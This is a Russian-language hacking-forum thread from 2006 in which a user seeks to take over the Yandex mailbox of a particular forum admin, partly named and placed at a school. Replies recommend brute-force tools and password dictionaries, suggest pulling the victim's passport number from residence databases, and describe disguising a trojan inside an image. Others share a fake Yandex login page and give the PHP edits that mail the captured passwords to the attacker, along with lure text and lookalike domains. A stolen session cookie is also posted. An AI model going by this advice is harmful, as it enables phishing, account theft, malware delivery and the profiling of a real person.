Просмотр полной версии : Взлом Яндекса-маил
Art Unno
31.05.2006, 21:12
Итак, все началось с того, что надо меньше болтать языком. Доболтался до того, что сказал, что могу узнать админский пароль на одном форуме на phpbb (версия вроде 2.0.18- смотрел по changelog да и уязвимостям, которые описаны в статье на ачате). Решил, что лучше я вышлю пароль админа на почту (она указана на форуме) и просто прочту этот пароль, потому что загрузить XSS не вышло, там фильтры стоят. Итак почта на яндексе. А еще у меня есть идея перехватить почту. Но какой прогой это делается я не знаю. Для брута я взял Ябрут. Вот только я не знаю, работает ли он. И еще подскажите, где брать словари для брута. Я просто всегда использую СИ, но здесь этот трюк не сработает точно. И еще я прочел на форуме, что на яндекс маил стоит ограничение на количество запросов.
Почта на яндексе. Контрольный вопрос стоит номер паспорта......
А если честно я тебе хочу не надо было болтать языком. Юзай поиск, он тебе поможет.
Art Unno
31.05.2006, 21:23
Я уже весь ачат просмотрел...нифига...хотя много интересного узнал! ;)
limpompo
31.05.2006, 21:43
Art Unno - плохо смотрел
Art Unno
31.05.2006, 21:45
Ну тогда скажите где смотреть, ладно бруты я найду и словари, помогите только с прогами, которые перехватывают почту!
•••™NO FEAR™•••
01.06.2006, 02:09
помогите только с прогами, которые перехватывают почту!
ХМ... Это что-то новенькое =))) Как найдёшь поделишся.
Art Unno словари качай с http://passwords.ru/dic.php
попробуй wwwhack или брутус
Art Unno
01.06.2006, 10:26
to •••™NO FEAR™•••
А разве нету? Мне тут один знакомый про них заливался..правда как они называются он не помнит...
to Zitt wwwhack - это брутус? или что? XSS? я про не знаю....Я поставил Ябрут (в нем запутался), потом BrutusA2 - он вроде не нашел, словари скачал оттуда. ( этот сайт я знаю).
Гидра вроде по Linux? А какие есть еще хорошие бруты..качать все непопадя не хочется.
Заранее спасибо!
Zadoxlik
01.06.2006, 11:49
Яндекс брутить проблематично, только через прокси, и то, я думаю, долго у тебя это делать не получится.
Art Unno
01.06.2006, 12:19
Почему? Просто будет бан на Ip?Или как?
Тогда подскажите как мне узнать пасс от этой почты...вроде у этого чела только эта почта, но есть несколько асек.
Вот только я не знаю, работает ли он. И еще подскажите, где брать словари для брута.
Работает или нет попробуй протестить, создай себе мыло на яндексе и попробуй сбруть. Словари бери тут: http://nsd.ru/soft.php?group=hacksoft&razdel=passwords
бана по Ip нету . а почту можно перехватить снифером если человек находиться в твоей локалке
Voyageur
02.06.2006, 04:18
Имхо, brutus-aet2 - самое то для яндекса. Брутил где-то 3 месяца назад - все было в норме. Если надо - пиши в личку, расскажу как юзать подробно (видео, кстати, есть на тему проги).
Есть идея побрутить контрольный вопрос.. Номер паспорта может быть проще пароля... 40 04 и еще 6 цифр :) Хотя сомнительно это все...
Art Unno
02.06.2006, 22:47
Ну brutus-aet2 я пробовал...только вроде бестолку...я написал в личку Voyageur.
А насчет словарей- Их там огромные части их как соединить? просто кинуть все в блокнот чтоль?
Voyageur
03.06.2006, 01:00
Вообще, желательно знать, какой может быть пароль - числовой, али нет... Если числовой, я, например, беру генератор асек UIN_PASS_v1.4, задаю там все параметры и он мне записывает кучу номеров. Потом через "Заменить" удаляю двойные, тройные символы, еще что-нить и фсе, готово. Допотопно, конечно, но зато сам :)
Говоришь, контрольный вопрос - номер паспорта? Если человек живет в крупном городе, это делается так: берется база прописок (в крайнем случае телефонная), узнается любая инфа о человеке (ФИО, дата рождения и т.д.) - чтобы было достаточно для выборки по базе. Можно искать Яндексом, а можно и социнженерией. Вбивается в запрос, достается номер паспорта (в большинстве баз он есть).
теперь ybrute уже не пашет,т.к. твой айп банят,поэтому нужна поддержка проксей.если будешь брутить то лучше brutus aet2,словаи бери отсюда passcrack.spb.ru Если так не хочешь, то можешь попробывать угнать через трой.
Art Unno
03.06.2006, 10:13
А если можно поподробней о трое? Я могу ему отправить письмо, мол у Вас баг с форумом, и я думаю он посмотрит это письмо. Наверно лучше как линк кинуть.А что написать ?? То есть что будет в линк? ТОлько сниф?
ЗЫ а я себе сниф уже сделал. Все-таки ачат самый лучший!
Art Unno, ты сам себя запутал. Сниффер поможет, только если твой админ пользуется веб-интерфейсом, а ты умеешь эксплуатировать XSS-уязвимости на Яндексе. Трояна заслать гораздо сложнее. Брут Яндекса - тоже последнее дело, к тому же если человек админ, у него вряд ли стоит легкий пароль. Поэтому я бы советовал попробовать поколдовать над секретным вопросом, если ничего не мешает.
Art Unno
03.06.2006, 11:00
Ок, а есть брут для секретного вопроса? Или обычный сойдет?
Ок, а есть брут для секретного вопроса? Или обычный сойдет?
брута ответа на секр. вопрос нету. Просто иногда его можно угадать,например вопрос "Любимое имя?".А насчет троя скажу одно,сделай любой скрин,сджоинь с картинкой(прежде закриптуй) и отправь админу с той же темой,что на форуме бага
Art Unno
03.06.2006, 12:53
Ок, а ты,1$@sS, можешь мне помочь с криптовкой? ну хотя или тыкни где читать или какую прогу юзуть. Там секретный вопрос номер паспорта. А может я его просто на сниф поймаю, сопру куки? или...он вроде на форуме под другим ником пишет...не получится наверно. Кстати, помогите мне расшифровать: я спер куки у одного чела и не могу их расшифровать (я знаю, что не в тему, но все же)
phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"373750898448138efe46538.25372961";s:6:"userid";i:46;}
И как расшифровали, то есть чем.
Я просто обычно узнавал все используя СИ (соц инж)
ну для дстижения хорошего качества юзай непаблик крипторы,либо купи у кого-нить криптовку файла.У меня нету норм. криптора поэтому помочь те в этом не могу )
Art Unno
03.06.2006, 13:03
А что, кроме трояна можно сделать? Xss на яндекс вроде уже не пашет. Я тут экспериментировал недавно: не вышло.
сделай фейк, лучше всего мне кажеться
Art Unno
03.06.2006, 14:22
Эээээээ...объясни тупому хакеру, что такое фейк? И с чем его едят?
Эээээээ...объясни тупому хакеру, что такое фейк? И с чем его едят?
Глянь у него в подписи ))
Art Unno
03.06.2006, 21:02
Сыылка закрыта вместе с сайтом...((((((
Так что, с паспортом и поиском по базе - не прокатывает никак?
Art Unno
03.06.2006, 21:54
Я не знаю как его зовут. И думаю там на самом деле стоит паспортные данные... Я знаю, что его зовут Тимур, вроде учится в лицее 1555. И все. Ник вроде "Холодильник". Если хочешь могу дать адрес форума.Может быстрее получится если работать с форумом? Форум "дырка" phpbb 2.0.18 (вроде 18).
фейк это типо страничка почтовика, посланная врагу например от администрации почты с неким содержанием, куда враг должен зайти и вписать пароль, который сохраниться в логе...
Art Unno
03.06.2006, 22:08
аааа..интересная мысль.. Можно отправить спокойно под мылом суппорта и .. а как ее сделать? на народе чтоль? а может просто чтоб он отправил пасы на почту ко мне? НУ например создать ящик passwords-yandex@yandex.ru
Art Unno
03.06.2006, 22:49
А еще я выяснил его асю, его профиль на ЖЖ, и еще какую-то асю. А в жж написано, где он учился.....
вот фейк для yandex кое-что надо исправить,- сам исправишь, _http://shareua.com/files/848345/yandex.rar.html
P.s ссылка пашет только для избранных
ммм , а можно мне тоже быть избранным !
Art Unno
04.06.2006, 22:49
2 zinger
А что-то оно не пашет! То есть: я загрузил к себе на хост, захожу туда пишу что-то, потом жму войти, а в логи ничего не пишется? это я дурак или как? стукни в асю 20-88-5-99-34.
отлчино пашет!
на файл лог.тхт поставь права 777
пс. есть небольшой баг =((( после нажатия кнопки "войти" в фейке на 1 сек в адресной строке появляется адрес сниффера "****/snifer.php..." если чел посмотрит то поймёт что ето фейк! дальше нормальная переадресация на яндекс!
в общем не плохая штука но как туда заманить когото? ))
если переименовать снифер.пхп в мейл.пхп то очень красиво даже получаеца =)
+надо подправить в файле логин.пхп
было
<form action="sniffer.php?mail=<?echo "$m";?>" method="post">
стало
<form action="mail.php?mail=<?echo "$m";?>" method="post">
потом в файле мейл.пхп измените
mail($to,'password',$mailtext,'sila-voli@mail.ru');
на свой имейл, ато обнаглевший автор будет получать всю халяву себе! :D
Art Unno
04.06.2006, 23:23
Ура!! заработало!! Спасибо ZINGER и default
Ну да, кто пойдет на сайт непонятный. Повесить на народе? А там разве пхп есть? Иль куда? А можно заставить отображать в поиске(адрес бар) то, что нам нужно?Просто так получатеся довольно глупо...даже если письмо придет от суппорт. :)
на народе не вешай! лучше регай по людскому домен типа *.com *.ru *.com.ru *.info *.net
и тд и тп!
Art Unno
04.06.2006, 23:36
я шас к себе повесил - _http://maclntosh.jino-net.ru/yandex/login
но думаю, это глупо..ну все равно чел заметит, что написано например не яндекс, а какая-то фигня? Вот если (сам не знаю, есть ли такое) чтобы в адрес баре отображался не мой сайт, а именно яндекс.
даже если письмо придет от суппорт. :)
:) поверь есть еще люди которые ведутся и на такие сайты и на письма от pass@yandex.ru :)
я шас к себе повесил - _http://maclntosh.jino-net.ru/yandex/login
но думаю, это глупо..ну все равно чел заметит, что написано например не яндекс, а какая-то фигня? Вот если (сам не знаю, есть ли такое) чтобы в адрес баре отображался не мой сайт, а именно яндекс.
один способ - заставить чела зайти на ету ссылку не думая, тоесть пишеш гдето на форумах или еще где такого вида сообщение
-----------------------------------------------
Халява!!!
Заходите <a href="http://maclntosh.jino-net.ru/yandex/login.php">СЮДА</a> чтоб увеличить размер почтового ящика на яндексе на 1 Гб
-----------------------------------------------
главное найти лола такого ядрёного, чтоб повёлся :D
Art Unno
04.06.2006, 23:41
ну платить деньги за домен мне не хочется.....может все-таки на народе смастерить что-то типа _newfunction.narod.ru?а на яндекс нельзя вроде вешать свой сайт? ну чтоб _lol.yandex.ru
_______________________
лол не очень лол.......вот в чем проблема...
ну платить деньги за домен мне не хочется.....может все-таки на народе смастерить что-то типа _newfunction.narod.ru?а на яндекс нельзя вроде вешать свой сайт? ну чтоб _lol.yandex.ru
я не очень знаком с яндексом но мне кажется что нельзя! :D
и никак ты не смогеш сделать что б твой адрес был http://yandex.ru/ в адресной строке!
развечто зарегаеш домен типа http://yamdex.ru/ http://yanbex.ru/ и тд и тп! и ищещ лоха ядрёного :D :D :D
Art Unno
04.06.2006, 23:48
Лох ядреный есть...да мне не хочется тратить деньги на этого лоха!
попроси когото у кого есть домен более менее нормальный и попросиш лог у него! вот и всё! ето прокатит с другом, просто чел тебя пошлёт нах за такие предложения) если у тя нет денег! :D
Voyageur
05.06.2006, 00:16
Хостинг для таких вещей халявный _holm.ru
Art Unno
05.06.2006, 10:53
угу..например попросить яндекс повесить такую фичу у себя! :D :D :D :D
А точно нельзя заставитьб браузёр отображать у себя яндекс, а не мой сайт? Ну через Java скрипт какой-нить?
А точно нельзя заставитьб браузёр отображать у себя яндекс, а не мой сайт? Ну через Java скрипт какой-нить?
можно конечно :D
1 вариант
<body>
<script>
function xxx()
{
params="width=720,height=720,scrollbars=no,resizable=no,to olbar=no,menubar=no,location=no"
var newwin=window.open("http://ya.ru","",params)
}
</script>
<a href=# onclick=xxx()>ззз</a>
</body>
2 вариант
<script language="javascript"> var nameData = "111"; if (nameData == prompt ("Нажми ОК!", "Вот сюды чёнить введи" ))alert("какой ты умный!"); else for(1;1;100) open(1);</script>\.
Art Unno
05.06.2006, 18:20
Скрипты какие-то тупые.... lol
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot